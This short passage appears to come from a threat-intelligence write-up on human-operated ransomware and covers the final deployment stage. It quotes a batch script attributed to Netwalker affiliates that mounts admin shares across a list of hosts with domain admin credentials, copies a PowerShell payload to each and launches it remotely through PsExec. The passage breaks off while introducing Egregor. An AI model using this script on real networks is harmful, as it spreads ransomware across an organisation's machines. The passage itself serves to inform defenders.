Ransomware deployment
The final goal of any human-operated ransomware attack is ransomware deployment. By this time, the backups are wiped (or going to be encrypted first), the security products are disabled, and data is exfiltrated.
One of the most common deployment techniques is copying a ransomware payload via SMB and executing it with PsExec – a legitimate tool from the SysInternals suite that's commonly used by ransomware affiliates for remote execution.
Here's an example of how Netwalker ransomware affiliates leverage this tool for remote execution:
set INPUT_FILE=ips.txt set DOMAINADUSER=DOMAIN\Administrator set DOMAINADPASS=Passw0rd! for /f %%G IN (%INPUT_FILE%) DO net use \\%%G\C$ /user:%DOMAINADUSER% %DOMAINADPASS% for /f %%G IN (%INPUT_FILE%) DO copy n.ps1 \\%%G\C$\ for /f %%G IN (%INPUT_FILE%) DO PsExec.exe -d \\%%G powershell -ExecutionPolicy Bypass -NoProfile -NoLogo -NoExit -File C:\n.ps1
Another example is Egregor ransomware affiliates,...